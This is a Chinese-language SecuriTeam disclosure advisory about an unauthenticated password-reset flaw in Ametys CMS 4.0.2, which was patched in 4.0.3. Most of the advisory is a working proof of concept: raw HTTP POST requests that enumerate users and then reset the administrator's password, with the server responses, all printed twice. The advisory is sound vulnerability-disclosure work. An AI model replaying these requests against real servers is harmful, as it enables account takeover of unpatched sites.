SSD安全公告–Ametys CMS未经身份验证

November 14, 2017 admin Chinese Translation, Password reset, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Tue, 14 Nov 2017 12:10:25 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope

漏洞概要
下面我们将描述在Ametys CMS 4.0.2版本中发现的密码重置漏洞。

Ametys是一个免费的开源内容管理系统（CMS），它基于JSR-170存储内容，有公开的小工具和一个面向xml的框架。

漏洞提交者
一位独立的安全研究人员—何塞·路易斯（Jose Luis），向Beyond Security的SSD报告了该漏洞。

厂商响应
Ametys已经发布了修补该漏洞的补丁-Ametys CMS 4.0.3

获取更多细节：https://issues.ametys.org/browse/RUNTIME-2582

漏洞详细信息

由于对用户的输入没有进行充分的检查，导致未经验证的用户可以执行未授权的管理操作。

Ametys CMS仅在Web请求中包含/cms/时才检查授权。这样，我们就可以重置任何用户的密码，包括管理员用户。

漏洞证明
通过发送以下POST请求，我们可以获得用户列表：

 POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1  Host: 192.168.196.128:8080  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0  Accept: */*  Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  Accept-Encoding: gzip, deflate  Referer: http://192.168.196.128:8080/cms/www/index.html  Content-Type: application/x-www-form-urlencoded; charset=UTF-8  X-Requested-With: XMLHttpRequest  Content-Length: 213  Cookie: JSESSIONID=  Connection: close    content={“0”:{“pluginOrWorkspace”:”core”,”responseType”:”text”,”url”:”users/search.json”,”p    arameters”:{“contexts”:[“/sites/www”,”/sites-  fo/www”],”criteria”:””,”limit”:100,”page”:1,”start”:0}}}}&context.parameters={}

然后，服务器将响应如下：

 HTTP/1.1 200 OK  Server: Apache-Coyote/1.1  X-Cocoon-Version: 2.1.13-dev  Content-Type: text/xml  Date: Tue, 03 Oct 2017 13:52:15 GMT  Connection: close  Content-Length: 1875    <?xml version=”1.0″ encoding=”UTF-8″?><responses><response id=”0″ code=”200″  duration=”946″>{“users”:[{“firstname”:”Simple”,”sortablename”:”Contributor  Simple”,”populationLabel”:”Ametys Demo  Users”,”populationId”:”ametys_demo_users”,”fullname”:”Simple  Contributor”,”login”:”contrib”,”directory”:”SQL  database”,”email”:”contrib@example.com”,”lastname”:”Contributor”},{“firstname”:”User1″,”s    ortablename”:”User1 User1″,”populationLabel”:”FO Demo Users”,”populationId”:”fo-demo-  users”,”fullname”:”User1 User1″,”login”:”user1@ametys.org”,”directory”:”SQL    database”,”email”:”user1@ametys.org”,”lastname”:”User1″},{“firstname”:”User3″,”sortablena    me”:”User3 User3″,”populationLabel”:”FO Demo Users”,”populationId”:”fo-demo-  users”,”fullname”:”User3 User3″,”login”:”user3@ametys.org”,”directory”:”SQL    database”,”email”:”user3@ametys.org”,”lastname”:”User3″},{“firstname”:”Webmaster”,”sorta  blename”:”User Webmaster”,”populationLabel”:”Ametys Demo  Users”,”populationId”:”ametys_demo_users”,”fullname”:”Webmaster  User”,”login”:”webmaster”,”directory”:”SQL  database”,”email”:”webmaster@example.com”,”lastname”:”User”},{“firstname”:”Manager”,”s  ortablename”:”User Manager”,”populationLabel”:”Ametys Demo  Users”,”populationId”:”ametys_demo_users”,”fullname”:”Manager  User”,”login”:”manager”,”directory”:”SQL  database”,”email”:”manager@example.com”,”lastname”:”User”},{“firstname”:”Administrator”  ,”sortablename”:”User Administrator”,”populationLabel”:”Ametys Demo  Users”,”populationId”:”ametys_demo_users”,”fullname”:”Administrator  User”,”login”:”admin”,”directory”:”SQL  database”,”email”:”admin@example.com”,”lastname”:”User”},{“firstname”:”User2″,”sortable    name”:”User2 User2″,”populationLabel”:”FO Demo Users”,”populationId”:”fo-demo-  users”,”fullname”:”User2 User2″,”login”:”user2@ametys.org”,”directory”:”SQL    database”,”email”:”user2@ametys.org”,”lastname”:”User2″}]}</response></responses>

HTTP/1.1 200 OK

Server: Apache–Coyote/1.1

X–Cocoon–Version: 2.1.13–dev

Content–Type: text/xml

Date: Tue, 03 Oct 2017 13:52:15 GMT

Connection: close

Content–Length: 1875

<?xml version=“1.0” encoding=“UTF-8”?><responses><response id=“0” code=“200”

duration=“946”>{“users”:[{“firstname”:“Simple”,“sortablename”:“Contributor

Simple”,“populationLabel”:“Ametys Demo

Users”,“populationId”:“ametys_demo_users”,“fullname”:“Simple

Contributor”,“login”:“contrib”,“directory”:“SQL

database”,“email”:“contrib@example.com”,“lastname”:“Contributor”},{“firstname”:“User1”,“s

ortablename”:“User1 User1”,“populationLabel”:“FO Demo Users”,“populationId”:“fo-demo-

users”,“fullname”:“User1 User1”,“login”:“user1@ametys.org”,“directory”:“SQL

database”,“email”:“user1@ametys.org”,“lastname”:“User1”},{“firstname”:“User3”,“sortablena

me”:“User3 User3”,“populationLabel”:“FO Demo Users”,“populationId”:“fo-demo-

users”,“fullname”:“User3 User3”,“login”:“user3@ametys.org”,“directory”:“SQL

database”,“email”:“user3@ametys.org”,“lastname”:“User3”},{“firstname”:“Webmaster”,“sorta

blename”:“User Webmaster”,“populationLabel”:“Ametys Demo

Users”,“populationId”:“ametys_demo_users”,“fullname”:“Webmaster

User”,“login”:“webmaster”,“directory”:“SQL

database”,“email”:“webmaster@example.com”,“lastname”:“User”},{“firstname”:“Manager”,“s

ortablename”:“User Manager”,“populationLabel”:“Ametys Demo

Users”,“populationId”:“ametys_demo_users”,“fullname”:“Manager

User”,“login”:“manager”,“directory”:“SQL

database”,“email”:“manager@example.com”,“lastname”:“User”},{“firstname”:“Administrator”

,“sortablename”:“User Administrator”,“populationLabel”:“Ametys Demo

Users”,“populationId”:“ametys_demo_users”,“fullname”:“Administrator

User”,“login”:“admin”,“directory”:“SQL

database”,“email”:“admin@example.com”,“lastname”:“User”},{“firstname”:“User2”,“sortable

name”:“User2 User2”,“populationLabel”:“FO Demo Users”,“populationId”:“fo-demo-

users”,“fullname”:“User2 User2”,“login”:“user2@ametys.org”,“directory”:“SQL

database”,“email”:“user2@ametys.org”,“lastname”:“User2”}]}</response></responses>

从服务器的响应中可以获取到字段“populationId”和“login”的值，这些值将会用于下一个请求。

现在，我们需要执行另一个请求来更改admin用户的密码：

 POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1  Host: 192.168.196.128:8080  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0  Accept: */*  Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  Accept-Encoding: gzip, deflate  Referer: http://192.168.196.128:8080/cms/www/index.html  Content-Type: application/x-www-form-urlencoded; charset=UTF-8  X-Requested-With: XMLHttpRequest  Content-Length: 345  Cookie: JSESSIONID=  Connection: close    content={“0”:{“pluginOrWorkspace”:”core-ui”,”responseType”:”text”,”url”:”client-  call”,”parameters”:{“role”:”org.ametys.plugins.core.user.UserDAO”,”methodName”:”editUser”    ,”parameters”:[“ametys_demo_users”,{“login”:”admin”,”password”:”MYNEWPASSWORD”,”fi  rstname”:”Administrator”,”lastname”:”User”,”email”:”admin@example.com”}]}}}&context.par  ameters={}

POST /plugins/core–ui/servercomm/messages.xml HTTP/1.1

Host: 192.168.196.128:8080

User–Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: */*

Accept–Language: es–ES,es;q=0.8,en–US;q=0.5,en;q=0.3

Accept–Encoding: gzip, deflate

Referer: http://192.168.196.128:8080/cms/www/index.html

Content–Type: application/x–www–form–urlencoded; charset=UTF–8

X–Requested–With: XMLHttpRequest

Content–Length: 345

Cookie: JSESSIONID=

Connection: close

content={“0”:{“pluginOrWorkspace”:“core-ui”,“responseType”:“text”,“url”:“client-

call”,“parameters”:{“role”:“org.ametys.plugins.core.user.UserDAO”,“methodName”:“editUser”

,“parameters”:[“ametys_demo_users”,{“login”:“admin”,“password”:“MYNEWPASSWORD”,“fi

rstname”:“Administrator”,“lastname”:“User”,“email”:“admin@example.com”}]}}}&context.par

ameters={}

执行这个请求后，服务器将响应：

 HTTP/1.1 200 OK  Server: Apache-Coyote/1.1  X-Cocoon-Version: 2.1.13-dev  Content-Type: text/xml  Date: Tue, 03 Oct 2017 13:52:59 GMT  Connection: close  Content-Length: 374    <?xml version=”1.0″ encoding=”UTF-8″?><responses><response id=”0″ code=”200″  duration=”110″>{“firstname”:”Administrator”,”sortablename”:”User  Administrator”,”populationLabel”:”Ametys Demo  Users”,”populationId”:”ametys_demo_users”,”fullname”:”Administrator  User”,”login”:”admin”,”directory”:”SQL  database”,”email”:”admin@example.com”,”lastname”:”User”}</response></responses>

HTTP/1.1 200 OK

Server: Apache–Coyote/1.1

X–Cocoon–Version: 2.1.13–dev

Content–Type: text/xml

Date: Tue, 03 Oct 2017 13:52:59 GMT

Connection: close

Content–Length: 374

<?xml version=“1.0” encoding=“UTF-8”?><responses><response id=“0” code=“200”

duration=“110”>{“firstname”:“Administrator”,“sortablename”:“User

Administrator”,“populationLabel”:“Ametys Demo

Users”,“populationId”:“ametys_demo_users”,“fullname”:“Administrator

User”,“login”:“admin”,“directory”:“SQL

database”,“email”:“admin@example.com”,“lastname”:“User”}</response></responses>

现在，你可以使用密码MYNEWPASSWORD以管理员身份登录系统。

https://blogs.securiteam.com/index.php/feed